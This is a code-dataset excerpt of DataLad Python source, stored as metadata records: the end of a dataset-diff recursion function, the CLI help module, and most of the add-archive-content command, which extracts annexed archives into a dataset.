else:\n raise ValueError(order)\n # for a dataset we need to decide whether to dive in, or not\n if props.get('type', None) == 'dataset' and (\n # subdataset path was given in rsync-style 'ds/'\n (paths and paths.get(path, False))\n # there is still sufficient recursion level left\n or recursion_level != 0\n # no recursion possible anymore, but one of the given\n # path arguments is in this subdataset\n or (recursion_level == 0\n and paths\n and any(path in p.parents for p in paths))):\n subds_state = props.get('state', None)\n if subds_state in ('clean', 'deleted'):\n # no need to look into the subdataset\n continue\n elif subds_state in ('added', 'modified'):\n # dive\n subds = Dataset(pathinds)\n call_args = (\n subds,\n # from before time or from the reported state\n fr if constant_refs\n else None\n if subds_state == 'added'\n else props['prev_gitshasum'],\n # to the last recorded state, or the worktree\n None if to is None\n else to if constant_refs\n else props['gitshasum'],\n constant_refs,\n )\n call_kwargs = dict(\n # subtract on level on the way down, unless the path\n # args instructed to go inside this subdataset\n recursion_level=recursion_level\n # protect against dropping below zero (would mean unconditional\n # recursion)\n if not recursion_level or (paths and paths.get(path, False))\n else recursion_level - 1,\n origpaths=origpaths,\n untracked=untracked,\n annexinfo=annexinfo,\n cache=cache,\n order=order,\n datasets_only=datasets_only,\n )\n if order in ('depth-first', 'bottom-up'):\n yield from _diff_ds(*call_args, **call_kwargs)\n elif order == 'breadth-first':\n subds_diffcalls.append((call_args, call_kwargs))\n else:\n raise ValueError(order)\n else:\n raise RuntimeError(\n \"Unexpected subdataset state '{}'. That sucks!\".format(\n subds_state))\n # deal with staged ds diffs (for bottom-up)\n for rec in ds_diffs:\n yield rec\n # deal with staged subdataset diffs (for breadth-first)\n for call_args, call_kwargs in subds_diffcalls:\n yield from _diff_ds(*call_args, **call_kwargs)\n" }, { "alpha_fraction": 0.5681620240211487, "alphanum_fraction": 0.5726189613342285, "avg_line_length": 36.25992965698242, "blob_id": "ebd49547e2bb2d06c78d58b9b32a0385e7e6822f", "content_id": "7530099921ade335c01e23f30642e52f689725e5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10321, "license_type": "permissive", "max_line_length": 94, "num_lines": 277, "path": "/datalad/cli/helpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"CONFIRMED TO BE UNIQUE TO THE CLI\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport argparse\nimport os\nimport re\nimport sys\nimport gzip\nimport textwrap\nfrom textwrap import wrap\n\nfrom datalad import __version__\n# delay?\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.ui.utils import get_console_width\nfrom datalad.utils import is_interactive\n\nfrom platformdirs import AppDirs\n\ndirs = AppDirs(\"datalad\", \"datalad.org\")\n\n\nfrom logging import getLogger\nlgr = getLogger('datalad.cli.helpers')\n\n\nclass HelpAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n # Lets use the manpage on mature systems but only for subcommands --\n # --help should behave similar to how git does it:\n # regular --help for \"git\" but man pages for specific commands.\n # It is important since we do discover all subcommands from entry\n # points at run time and thus any static manpage would like be out of\n # date\n interactive = is_interactive()\n if interactive \\\n and option_string == '--help' \\\n and ' ' in parser.prog: # subcommand\n self._try_manpage(parser)\n if option_string == '-h':\n helpstr = self._get_short_help(parser)\n else:\n helpstr = self._get_long_help(parser)\n\n # normalize capitalization to what we \"always\" had\n helpstr = f'Usage:{helpstr[6:]}'\n\n if interactive and option_string == '--help':\n import pydoc\n pydoc.pager(helpstr)\n else:\n print(helpstr)\n sys.exit(0)\n\n def _get_long_help(self, parser):\n helpstr = parser.format_help()\n if ' ' in parser.prog: # subcommand\n # in case of a subcommand there is no need to pull the\n # list of top-level subcommands\n return helpstr\n helpstr = re.sub(\n r'^[uU]sage: .*?\\n\\s*\\n',\n 'Usage: datalad [global-opts] command [command-opts]\\n\\n',\n helpstr,\n flags=re.MULTILINE | re.DOTALL)\n # split into preamble and options\n preamble = []\n options = []\n in_options = False\n for line in helpstr.splitlines():\n if line in ('options:', 'optional arguments:'):\n in_options = True\n continue\n (options if in_options else preamble).append(line)\n\n intf = self._get_all_interfaces()\n from datalad.interface.base import (\n get_cmd_doc,\n load_interface,\n )\n from .interface import (\n get_cmdline_command_name,\n alter_interface_docs_for_cmdline,\n )\n preamble = get_description_with_cmd_summary(\n # produce a mapping of command groups to\n # [(cmdname, description), ...]\n {\n i[0]: [(\n get_cmdline_command_name(c),\n # alter_interface_docs_for_cmdline is only needed, because\n # some commands use sphinx markup in their summary line\n # stripping that takes 10-30ms for a typical datalad\n # installation with some extensions\n alter_interface_docs_for_cmdline(\n # we only take the first line\n get_cmd_doc(\n # we must import the interface class\n # this will engage @build_doc -- unavoidable right\n # now\n load_interface(c)\n ).split('\\n', maxsplit=1)[0]))\n for c in i[2]]\n for i in intf\n },\n intf,\n '\\n'.join(preamble),\n )\n return '{}\\n\\n*Global options*\\n{}\\n'.format(\n preamble,\n '\\n'.join(options),\n )\n\n def _get_short_help(self, parser):\n usage = parser.format_usage()\n hint = \"Use '--help' to get more comprehensive information.\"\n if ' ' in parser.prog: # subcommand\n # in case of a subcommand there is no need to pull the\n # list of top-level subcommands\n return f\"{usage}\\n{hint}\"\n\n # get the list of commands and format them like\n # argparse would present subcommands\n commands = get_commands_from_groups(self._get_all_interfaces())\n indent = usage.splitlines()[-1]\n indent = indent[:-len(indent.lstrip())] + ' '\n usage += f'{indent[1:]}{{'\n usage += '\\n'.join(wrap(\n ', '.join(sorted(c.strip() for c in commands)),\n break_on_hyphens=False,\n subsequent_indent=indent))\n usage += f'}}\\n{indent[1:]}...\\n'\n return f\"{usage}\\n{hint}\"\n\n def _get_all_interfaces(self):\n # load all extensions and command specs\n # this does not fully tune all the command docs\n from datalad.interface.base import get_interface_groups\n interface_groups = get_interface_groups()\n add_entrypoints_to_interface_groups(interface_groups)\n return interface_groups\n\n def _try_manpage(self, parser):\n try:\n import subprocess\n # get the datalad manpage to use\n manfile = os.environ.get('MANPATH', '/usr/share/man') \\\n + '/man1/{0}.1.gz'.format(parser.prog.replace(' ', '-'))\n # extract version field from the manpage\n if not os.path.exists(manfile):\n raise IOError(\"manfile is not found\")\n with gzip.open(manfile) as f:\n man_th = [line for line in f if line.startswith(b\".TH\")][0]\n man_version = man_th.split(b' ')[-1].strip(b\" '\\\"\\t\\n\").decode('utf-8')\n\n # don't show manpage if man_version not equal to current datalad_version\n if __version__ != man_version:\n raise ValueError\n subprocess.check_call(\n 'man %s 2> /dev/null' % manfile,\n shell=True)\n sys.exit(0)\n except (subprocess.CalledProcessError, IOError, OSError, IndexError, ValueError) as e:\n ce = CapturedException(e)\n lgr.debug(\"Did not use manpage since %s\", ce)\n\n\nclass LogLevelAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n from datalad.log import LoggerHelper\n LoggerHelper().set_level(level=values)\n\n\n#\n# Some logic modules extracted from main.py to de-spagetify\n#\n\n\ndef add_entrypoints_to_interface_groups(interface_groups):\n from datalad.support.entrypoints import iter_entrypoints\n for name, _, spec in iter_entrypoints('datalad.extensions', load=True):\n if len(spec) < 2 or not spec[1]:\n # entrypoint identity was logged by the iterator already\n lgr.debug('Extension does not provide a command suite')\n continue\n interface_groups.append((name, spec[0], spec[1]))\n\n\ndef get_commands_from_groups(groups):\n \"\"\"Get a dictionary of command: interface_spec\"\"\"\n from .interface import get_cmdline_command_name\n return {\n get_cmdline_command_name(_intfspec): _intfspec\n for _, _, _interfaces in groups\n for _intfspec in _interfaces\n }\n\n\ndef _fix_datalad_ri(s):\n \"\"\"Fixup argument if it was a DataLadRI and had leading / removed\n\n See gh-2643\n \"\"\"\n if s.startswith('//') and (len(s) == 2 or (len(s) > 2 and s[2] != '/')):\n lgr.info(\n \"Changing %s back to /%s as it was probably changed by MINGW/MSYS, \"\n \"see http://www.mingw.org/wiki/Posix_path_conversion\", s, s)\n return \"/\" + s\n return s\n\n\ndef get_description_with_cmd_summary(grp_short_descriptions, interface_groups,\n parser_description):\n from .interface import (\n dedent_docstring,\n )\n from datalad.interface.base import get_cmd_summaries\n lgr.debug(\"Generating detailed description for the parser\")\n\n console_width = get_console_width()\n cmd_summary = get_cmd_summaries(grp_short_descriptions, interface_groups,\n width=console_width)\n # we need one last formal section to not have the trailed be\n # confused with the last command group\n cmd_summary.append('\\n*General information*\\n')\n detailed_description = '{}{}\\n{}\\n'.format(\n parser_description,\n '\\n'.join(cmd_summary),\n textwrap.fill(dedent_docstring(\"\"\"\\\n Detailed usage information for individual commands is\n available via command-specific --help, i.e.:\n datalad <command> --help\"\"\"),\n console_width - 5,\n initial_indent='',\n subsequent_indent=''))\n return detailed_description\n\n\ndef _parse_overrides_from_cmdline(cmdlineargs):\n \"\"\"parse config overrides provided in command line\n\n Might exit(3) the entire process if value is not assigned\"\"\"\n # this expression is deliberately loose as gitconfig offers\n # quite some flexibility -- this is just meant to catch stupid\n # errors: we need a section, a variable, and a value at minimum\n # otherwise we break our own config parsing helpers\n # https://github.com/datalad/datalad/issues/3451\n assign_expr = re.compile(r'[^\\s]+\\.[^\\s]+=[\\S]+')\n unset_expr = re.compile(r':[^\\s]+\\.[^\\s=]+')\n noassign = [\n o\n for o in cmdlineargs.cfg_overrides\n if not (assign_expr.match(o) or unset_expr.match(o))\n ]\n if noassign:\n lgr.error(\n \"Configuration override without section/variable \"\n \"or unset marker or value assignment \"\n \"(must be '(:section.variable|section.variable=value)'): %s\",\n noassign)\n sys.exit(3)\n overrides = dict(\n [o[1:], None] if o.startswith(':')\n else o.split('=', 1)\n for o in cmdlineargs.cfg_overrides\n )\n return overrides\n" }, { "alpha_fraction": 0.5134968757629395, "alphanum_fraction": 0.5148270726203918, "avg_line_length": 42.22861099243164, "blob_id": "3eb5ff40aa453fb77bd1453589bc914473bf3886", "content_id": "a75152d2b1a872a927ded8f25dc60d27c71c45c3", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30822, "license_type": "permissive", "max_line_length": 184, "num_lines": 713, "path": "/datalad/local/add_archive_content.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for adding content of an archive under annex control\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport os\nimport re\nimport tempfile\nimport warnings\nfrom os.path import (\n basename,\n curdir,\n exists,\n)\nfrom os.path import join as opj\nfrom os.path import lexists\nfrom os.path import sep as opsep\n\nfrom datalad.consts import ARCHIVES_SPECIAL_REMOTE\nfrom datalad.customremotes.base import ensure_datalad_remote\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import allow_dirty\nfrom datalad.interface.results import get_status_dict\nfrom datalad.log import (\n log_progress,\n logging,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.support.stats import ActivityStats\nfrom datalad.support.strings import apply_replacement_rules\nfrom datalad.utils import (\n Path,\n ensure_tuple_or_list,\n file_basename,\n getpwd,\n md5sum,\n rmtree,\n split_cmdline,\n)\n\nlgr = logging.getLogger('datalad.local.add_archive_content')\n\n\n# Shortcut note\n_KEY_OPT = \"[PY: `key=True` PY][CMD: --key CMD]\"\n_KEY_OPT_NOTE = \"Note that it will be of no effect if %s is given\" % _KEY_OPT\n\n# TODO: may be we could enable separate logging or add a flag to enable\n# all but by default to print only the one associated with this given action\n\n\n@build_doc\nclass AddArchiveContent(Interface):\n \"\"\"Add content of an archive under git annex control.\n\n Given an already annex'ed archive, extract and add its files to the\n dataset, and reference the original archive as a custom special remote.\n\n \"\"\"\n _examples_ = [\n dict(text=\"\"\"Add files from the archive 'big_tarball.tar.gz', but\n keep big_tarball.tar.gz in the index\"\"\",\n code_py=\"add_archive_content(path='big_tarball.tar.gz')\",\n code_cmd=\"datalad add-archive-content big_tarball.tar.gz\"),\n dict(text=\"\"\"Add files from the archive 'tarball.tar.gz', and\n remove big_tarball.tar.gz from the index\"\"\",\n code_py=\"add_archive_content(path='big_tarball.tar.gz', delete=True)\",\n code_cmd=\"datalad add-archive-content big_tarball.tar.gz --delete\"),\n dict(text=\"\"\"Add files from the archive 's3.zip' but remove the leading\n directory\"\"\",\n code_py=\"add_archive_content(path='s3.zip', strip_leading_dirs=True)\",\n code_cmd=\"datalad add-archive-content s3.zip --strip-leading-dirs\"),\n ]\n\n # XXX prevent common args from being added to the docstring\n _no_eval_results = True\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to save\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n delete=Parameter(\n args=(\"-D\", \"--delete\"),\n action=\"store_true\",\n doc=\"\"\"delete original archive from the filesystem/Git in current\n tree. %s\"\"\" % _KEY_OPT_NOTE),\n add_archive_leading_dir=Parameter(\n args=(\"--add-archive-leading-dir\",),\n action=\"store_true\",\n doc=\"\"\"place extracted content under a directory which would\n correspond to the archive name with all suffixes stripped. E.g. the\n content of `archive.tar.gz` will be extracted under `archive/`\"\"\"),\n strip_leading_dirs=Parameter(\n args=(\"--strip-leading-dirs\",),\n action=\"store_true\",\n doc=\"\"\"remove one or more leading directories from the archive\n layout on extraction\"\"\"),\n leading_dirs_depth=Parameter(\n args=(\"--leading-dirs-depth\",),\n action=\"store\",\n type=int,\n doc=\"\"\"maximum depth of leading directories to strip.\n If not specified (None), no limit\"\"\"),\n leading_dirs_consider=Parameter(\n args=(\"--leading-dirs-consider\",),\n action=\"append\",\n doc=\"\"\"regular expression(s) for directories to consider to strip\n away\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n ),\n use_current_dir=Parameter(\n args=(\"--use-current-dir\",),\n action=\"store_true\",\n doc=\"\"\"extract the archive under the current directory, not the\n directory where the archive is located. This parameter is applied\n automatically if [PY: `key=True` PY][CMD: --key CMD] was used.\"\"\"),\n # TODO: add option to extract under archive's original directory. Currently would extract in curdir\n existing=Parameter(\n args=(\"--existing\",),\n choices=('fail', 'overwrite', 'archive-suffix', 'numeric-suffix'),\n default=\"fail\",\n doc=\"\"\"what operation to perform if a file from an archive tries to\n overwrite an existing file with the same name. 'fail' (default)\n leads to an error result, 'overwrite' silently replaces\n existing file, 'archive-suffix' instructs to add a suffix (prefixed\n with a '-') matching archive name from which file gets extracted,\n and if that one is present as well, 'numeric-suffix' is in effect in\n addition, when incremental numeric suffix (prefixed with a '.') is\n added until no name collision is longer detected\"\"\"\n ),\n exclude=Parameter(\n args=(\"-e\", \"--exclude\"),\n action='append',\n doc=\"\"\"regular expressions for filenames which to exclude from being\n added to annex. Applied after --rename if that one is specified.\n For exact matching, use anchoring\"\"\",\n constraints=EnsureStr() | EnsureNone()\n ),\n rename=Parameter(\n args=(\"-r\", \"--rename\"),\n action='append',\n doc=\"\"\"regular expressions to rename files before added them under\n to Git. The first defines how to split provided string into\n two parts: Python regular expression (with groups), and replacement\n string\"\"\",\n constraints=EnsureStr(min_len=2) | EnsureNone()\n ),\n annex_options=Parameter(\n args=(\"-o\", \"--annex-options\"),\n doc=\"\"\"additional options to pass to git-annex \"\"\",\n constraints=EnsureStr() | EnsureNone()\n ),\n annex=Parameter(\n doc=\"\"\"DEPRECATED. Use the 'dataset' parameter instead.\"\"\"\n ),\n # TODO: Python only!\n stats=Parameter(\n doc=\"\"\"ActivityStats instance for global tracking\"\"\",\n ),\n key=Parameter(\n args=(\"--key\",),\n action=\"store_true\",\n doc=\"\"\"signal if provided archive is not actually a filename on its\n own but an annex key. The archive will be extracted in the current\n directory.\"\"\"),\n copy=Parameter(\n args=(\"--copy\",),\n action=\"store_true\",\n doc=\"\"\"copy the content of the archive instead of moving\"\"\"),\n allow_dirty=allow_dirty,\n commit=Parameter(\n args=(\"--no-commit\",),\n action=\"store_false\",\n dest=\"commit\",\n doc=\"\"\"don't commit upon completion\"\"\"),\n drop_after=Parameter(\n args=(\"--drop-after\",),\n action=\"store_true\",\n doc=\"\"\"drop extracted files after adding to annex\"\"\",\n ),\n delete_after=Parameter(\n args=(\"--delete-after\",),\n action=\"store_true\",\n doc=\"\"\"extract under a temporary directory, git-annex add, and\n delete afterwards. To be used to \"index\" files within annex without\n actually creating corresponding files under git. Note that\n `annex dropunused` would later remove that load\"\"\"),\n\n # TODO: interaction with archives cache whenever we make it persistent across runs\n archive=Parameter(\n args=(\"archive\",),\n doc=\"archive file or a key (if %s specified)\" % _KEY_OPT,\n constraints=EnsureStr()),\n )\n\n @staticmethod\n @datasetmethod(name='add_archive_content')\n @eval_results\n def __call__(\n archive,\n *,\n dataset=None,\n annex=None,\n add_archive_leading_dir=False,\n strip_leading_dirs=False,\n leading_dirs_depth=None,\n leading_dirs_consider=None,\n use_current_dir=False,\n delete=False,\n key=False,\n exclude=None,\n rename=None,\n existing='fail',\n annex_options=None,\n copy=False,\n commit=True,\n allow_dirty=False,\n stats=None,\n drop_after=False,\n delete_after=False):\n\n if exclude:\n exclude = ensure_tuple_or_list(exclude)\n if rename:\n rename = ensure_tuple_or_list(rename)\n ds = require_dataset(dataset,\n check_installed=True,\n purpose='add-archive-content')\n\n # set up common params for result records\n res_kwargs = {\n 'action': 'add-archive-content',\n 'logger': lgr,\n }\n\n if not isinstance(ds.repo, AnnexRepo):\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=\"Can't operate in a pure Git repository\",\n **res_kwargs\n )\n return\n if annex:\n warnings.warn(\n \"datalad add_archive_content's `annex` parameter is \"\n \"deprecated and will be removed in a future release. \"\n \"Use the 'dataset' parameter instead.\",\n DeprecationWarning)\n annex = ds.repo\n # get the archive path relative from the ds root\n archive_path = resolve_path(archive, ds=dataset)\n # let Status decide whether we can act on the given file\n for s in ds.status(\n path=archive_path,\n on_failure='ignore',\n result_renderer='disabled'):\n if s['status'] == 'error':\n if 'path not underneath the reference dataset %s' in s['message']:\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message='Can not add archive outside of the dataset',\n **res_kwargs)\n return\n # status errored & we haven't anticipated the cause. Bubble up\n yield s\n return\n elif s['state'] == 'untracked':\n # we can't act on an untracked file\n message = (\n \"Can not add an untracked archive. \"\n \"Run 'datalad save {}'\".format(archive)\n )\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=message,\n **res_kwargs)\n return\n\n if not allow_dirty and annex.dirty:\n # error out here if the dataset contains untracked changes\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=(\n 'clean dataset required. '\n 'Use `datalad status` to inspect unsaved changes'),\n **res_kwargs\n )\n return\n\n # ensure the archive exists, status doesn't error on a non-existing file\n if not key and not lexists(archive_path):\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=(\n 'No such file: {}'.format(archive_path),\n ),\n **res_kwargs\n )\n return\n\n if not key:\n check_path = archive_path.relative_to(ds.pathobj)\n # TODO: support adding archives content from outside the annex/repo\n origin = 'archive'\n # can become get_file_annexinfo once #6104 is merged\n key = annex.get_file_annexinfo(check_path)['key']\n if not key:\n raise RuntimeError(\n f\"Archive must be an annexed file in {ds}\")\n archive_dir = Path(archive_path).parent\n else:\n origin = 'key'\n key = archive\n # We must not have anything to do with the location under .git/annex\n archive_dir = None\n # instead, we will go from the current directory\n use_current_dir = True\n\n archive_basename = file_basename(archive)\n\n if not key:\n # if we didn't manage to get a key, the file must be in Git\n raise NotImplementedError(\n \"Provided file %s does not seem to be under annex control. \"\n \"We don't support adding everything straight to Git\" % archive\n )\n\n # figure out our location\n pwd = getpwd()\n # are we in a subdirectory of the repository?\n pwd_in_root = annex.path == archive_dir\n # then we should add content under that subdirectory,\n # get the path relative to the repo top\n if use_current_dir:\n # extract the archive under the current directory, not the directory\n # where the archive is located\n extract_rpath = Path(pwd).relative_to(ds.path) \\\n if not pwd_in_root \\\n else None\n else:\n extract_rpath = archive_dir.relative_to(ds.path)\n\n # relpath might return '.' as the relative path to curdir, which then normalize_paths\n # would take as instructions to really go from cwd, so we need to sanitize\n if extract_rpath == curdir:\n extract_rpath = None\n\n try:\n key_rpath = annex.get_contentlocation(key)\n except:\n # the only probable reason for this to fail is that there is no\n # content present\n raise RuntimeError(\n \"Content of %s seems to be N/A. Fetch it first\" % key\n )\n\n # now we simply need to go through every file in that archive and\n lgr.info(\n \"Adding content of the archive %s into annex %s\", archive, annex\n )\n\n from datalad.customremotes.archives import ArchiveAnnexCustomRemote\n\n # TODO: shouldn't we be able just to pass existing AnnexRepo instance?\n # TODO: we will use persistent cache so we could just (ab)use possibly extracted archive\n # OK, let's ignore that the following class is actually a special\n # remote implementation, and use it only to work with its cache\n annexarchive = ArchiveAnnexCustomRemote(annex=None,\n path=annex.path,\n persistent_cache=True)\n # We will move extracted content so it must not exist prior running\n annexarchive.cache.allow_existing = True\n earchive = annexarchive.cache[key_rpath]\n # make sure there is an enabled datalad-archives special remote\n ensure_datalad_remote(ds.repo, remote=ARCHIVES_SPECIAL_REMOTE,\n autoenable=True)\n\n precommitted = False\n old_always_commit = annex.always_commit\n # batch mode is disabled when faking dates, we want to always commit\n annex.always_commit = annex.fake_dates_enabled\n if annex_options:\n if isinstance(annex_options, str):\n annex_options = split_cmdline(annex_options)\n delete_after_rpath = None\n\n prefix_dir = basename(tempfile.mkdtemp(prefix=\".datalad\",\n dir=annex.path)) \\\n if delete_after \\\n else None\n\n # dedicated stats which would be added to passed in (if any)\n outside_stats = stats\n stats = ActivityStats()\n\n # start a progress bar for extraction\n pbar_id = f'add-archive-{archive_path}'\n try:\n # keep track of extracted files for progress bar logging\n file_counter = 0\n # iterative over all files in the archive\n extracted_files = list(earchive.get_extracted_files())\n log_progress(\n lgr.info, pbar_id, 'Extracting archive',\n label=\"Extracting archive\",\n unit=' Files',\n total = len(extracted_files),\n noninteractive_level = logging.INFO)\n for extracted_file in extracted_files:\n file_counter += 1\n files_left = len(extracted_files) - file_counter\n log_progress(\n lgr.info, pbar_id,\n \"Files to extract %i \", files_left,\n update=1,\n increment=True,\n noninteractive_level=logging.DEBUG)\n stats.files += 1\n extracted_path = Path(earchive.path) / Path(extracted_file)\n\n if extracted_path.is_symlink():\n link_path = str(extracted_path.resolve())\n if not exists(link_path):\n # TODO: config addarchive.symlink-broken='skip'\n lgr.warning(\n \"Path %s points to non-existing file %s\" %\n (extracted_path, link_path)\n )\n stats.skipped += 1\n continue\n # TODO: check if points outside of archive - warn & skip\n\n url = annexarchive.get_file_url(\n archive_key=key,\n file=extracted_file,\n size=os.stat(extracted_path).st_size)\n\n # preliminary target name which might get modified by renames\n target_file_orig = target_file = Path(extracted_file)\n\n # stream archives would not have had the original filename\n # information in them, so would be extracted under a name\n # derived from their annex key.\n # Provide ad-hoc handling for such cases\n if (len(extracted_files) == 1 and\n Path(archive).suffix in ('.xz', '.gz', '.lzma') and\n Path(key_rpath).name.startswith(Path(\n extracted_file).name)):\n # take archive's name without extension for filename & place\n # where it was originally extracted\n target_file = \\\n Path(extracted_file).parent / Path(archive).stem\n\n if strip_leading_dirs:\n leading_dir = earchive.get_leading_directory(\n depth=leading_dirs_depth, exclude=exclude,\n consider=leading_dirs_consider)\n leading_dir_len = \\\n len(leading_dir) + len(opsep) if leading_dir else 0\n target_file = str(target_file)[leading_dir_len:]\n\n if add_archive_leading_dir:\n # place extracted content under a directory corresponding to\n # the archive name with suffix stripped.\n target_file = Path(archive_basename) / target_file\n\n if rename:\n target_file = apply_replacement_rules(rename,\n str(target_file))\n\n # continue to next iteration if extracted_file in excluded\n if exclude:\n try: # since we need to skip outside loop from inside loop\n for regexp in exclude:\n if re.search(regexp, extracted_file):\n lgr.debug(\n \"Skipping %s since contains %s pattern\",\n extracted_file, regexp)\n stats.skipped += 1\n raise StopIteration\n except StopIteration:\n continue\n\n if delete_after:\n # place target file in a temporary directory\n target_file = Path(prefix_dir) / Path(target_file)\n # but also allow for it in the orig\n target_file_orig = Path(prefix_dir) / Path(target_file_orig)\n\n target_file_path_orig = annex.pathobj / target_file_orig\n\n # If we were invoked in a subdirectory, patch together the\n # correct path\n target_file_path = extract_rpath / target_file \\\n if extract_rpath else target_file\n target_file_path = annex.pathobj / target_file_path\n\n # when the file already exists...\n if lexists(target_file_path):\n handle_existing = True\n if md5sum(str(target_file_path)) == \\\n md5sum(str(extracted_path)):\n if not annex.is_under_annex(str(extracted_path)):\n # if under annex -- must be having the same content,\n # we should just add possibly a new extra URL\n # but if under git -- we cannot/should not do\n # anything about it ATM\n if existing != 'overwrite':\n continue\n else:\n handle_existing = False\n if not handle_existing:\n pass # nothing... just to avoid additional indentation\n elif existing == 'fail':\n message = \\\n \"{} exists, but would be overwritten by new file \" \\\n \"{}. Consider adjusting --existing\".format\\\n (target_file_path, extracted_file)\n yield get_status_dict(\n ds=ds,\n status='error',\n message=message,\n **res_kwargs)\n return\n elif existing == 'overwrite':\n stats.overwritten += 1\n # to make sure it doesn't conflict -- might have been a\n # tree\n rmtree(target_file_path)\n else:\n # an elaborate dance to piece together new archive names\n target_file_path_orig_ = target_file_path\n\n # To keep extension intact -- operate on the base of the\n # filename\n p, fn = os.path.split(target_file_path)\n ends_with_dot = fn.endswith('.')\n fn_base, fn_ext = file_basename(fn, return_ext=True)\n\n if existing == 'archive-suffix':\n fn_base += '-%s' % archive_basename\n elif existing == 'numeric-suffix':\n pass # archive-suffix will have the same logic\n else:\n # we shouldn't get here, argparse should catch a\n # non-existing value for --existing right away\n raise ValueError(existing)\n # keep incrementing index in the suffix until file\n # doesn't collide\n suf, i = '', 0\n while True:\n connector = \\\n ('.' if (fn_ext or ends_with_dot) else '')\n file = fn_base + suf + connector + fn_ext\n target_file_path_new = \\\n Path(p) / Path(file)\n if not lexists(target_file_path_new):\n # we found a file name that is not yet taken\n break\n lgr.debug(\"Iteration %i of file name finding. \"\n \"File %s already exists\", i,\n target_file_path_new)\n i += 1\n suf = '.%d' % i\n target_file_path = target_file_path_new\n lgr.debug(\"Original file %s will be saved into %s\"\n % (target_file_path_orig_, target_file_path))\n # TODO: should we reserve smth like\n # stats.clobbed += 1\n\n if target_file_path != target_file_path_orig:\n stats.renamed += 1\n\n if copy:\n raise NotImplementedError(\n \"Not yet copying from 'persistent' cache\"\n )\n\n lgr.debug(\"Adding %s to annex pointing to %s and with options \"\n \"%r\", target_file_path, url, annex_options)\n\n out_json = annex.add_url_to_file(\n target_file_path,\n url, options=annex_options,\n batch=True)\n\n if 'key' in out_json and out_json['key'] is not None:\n # annex.is_under_annex(target_file, batch=True):\n # due to http://git-annex.branchable.com/bugs/annex_drop_is_not___34__in_effect__34___for_load_which_was___34__addurl_--batch__34__ed_but_not_yet_committed/?updated\n # we need to maintain a list of those to be dropped files\n if drop_after:\n # drop extracted files after adding to annex\n annex.drop_key(out_json['key'], batch=True)\n stats.dropped += 1\n stats.add_annex += 1\n else:\n lgr.debug(\"File %s was added to git, not adding url\",\n target_file_path)\n stats.add_git += 1\n\n if delete_after:\n # we count the removal here, but don't yet perform it\n # to not interfere with batched processes - any pure Git\n # action invokes precommit which closes batched processes.\n stats.removed += 1\n\n # Done with target_file -- just to have clear end of the loop\n del target_file\n\n if delete and archive and origin != 'key':\n lgr.debug(\"Removing the original archive %s\", archive)\n # force=True since some times might still be staged and fail\n annex.remove(str(archive_path), force=True)\n\n lgr.info(\"Finished adding %s: %s\", archive, stats.as_str(mode='line'))\n\n if outside_stats:\n outside_stats += stats\n if delete_after:\n # force since not committed. r=True for -r (passed into git call\n # to recurse)\n delete_after_rpath = opj(extract_rpath, prefix_dir) \\\n if extract_rpath else prefix_dir\n delete_after_rpath = resolve_path(delete_after_rpath,\n ds=dataset)\n lgr.debug(\n \"Removing extracted and annexed files under %s\",\n delete_after_rpath\n )\n annex.remove(str(delete_after_rpath), r=True, force=True)\n if commit:\n archive_rpath = archive_path.relative_to(ds.path)\n commit_stats = outside_stats if outside_stats else stats\n # so batched ones close and files become annex symlinks etc\n annex.precommit()\n precommitted = True\n if any(r.get('state', None) != 'clean'\n for p, r in annex.status(untracked='no').items()):\n annex.commit(\n \"Added content extracted from %s %s\\n\\n%s\" %\n (origin, archive_rpath,\n commit_stats.as_str(mode='full')),\n _datalad_msg=True\n )\n commit_stats.reset()\n else:\n # don't commit upon completion\n pass\n finally:\n # take down the progress bar\n log_progress(\n lgr.info, pbar_id,\n 'Finished extraction',\n noninteractive_level=logging.INFO)\n # since we batched addurl, we should close those batched processes\n # if haven't done yet. explicitly checked to avoid any possible\n # \"double-action\"\n if not precommitted:\n annex.precommit()\n\n if delete_after_rpath:\n delete_after_path = opj(annex.path, delete_after_rpath)\n delete_after_rpath = resolve_path(delete_after_rpath,\n ds=dataset)\n if exists(delete_after_path): # should not be there\n # but for paranoid yoh\n lgr.warning(\n \"Removing temporary directory under which extracted \"\n \"files were annexed and should have been removed: %s\",\n delete_after_path)\n 